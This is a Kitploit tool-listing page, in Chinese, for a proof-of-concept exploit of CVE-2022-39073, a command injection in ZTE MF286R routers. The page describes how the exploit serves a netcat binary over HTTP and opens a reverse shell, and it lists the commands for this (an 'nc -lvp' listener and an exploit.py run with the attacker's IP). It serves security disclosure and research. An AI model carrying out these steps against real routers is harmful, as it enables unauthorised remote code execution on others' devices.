Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/v0lp3/cve-2022-39073
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用命令与控制远程访问工具
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

针对影响 ZTE MF286R 路由器的命令注入漏洞的概念验证,包含一个 RCE 漏洞利用。

查看仓库
114123年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-39073

固件详细信息:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

前置条件

  • requests(pip install requests)

命令注入

该漏洞是 zte_net_link_detect 二进制程序与 Web 服务器 goahead 二进制程序中的 WATCH_DOG_SWITCH 处理器之间共享的一个命令注入漏洞。

请注意,仅当路由器通过 WAN 连接到互联网或通过 SIM 卡连接到互联网时,该漏洞才能被利用。("ppp_status" 键的值必须是 "ppp_connected"、"ipv4_ipv6_connected" 或 "ipv6_connected")。

风险

  • 远程代码执行(RCE)
  • 任意命令执行

概念验证

该漏洞利用的思路是从 http 服务器下载 netcat 静态二进制文件,然后使用它打开一个反向 shell。 附注:此文件夹中包含的 netcat 是大端序的。

  • 在此目录中打开一个 http 服务器:python3 -m http.server 8080
  • 使用 nc -lvp 9999 在端口 9999 上打开一个监听套接字
  • 运行此文件夹中的脚本:python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>

参考

此漏洞由 Andrea Maugeri 于 2022 年 9 月报告。 https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

下载工具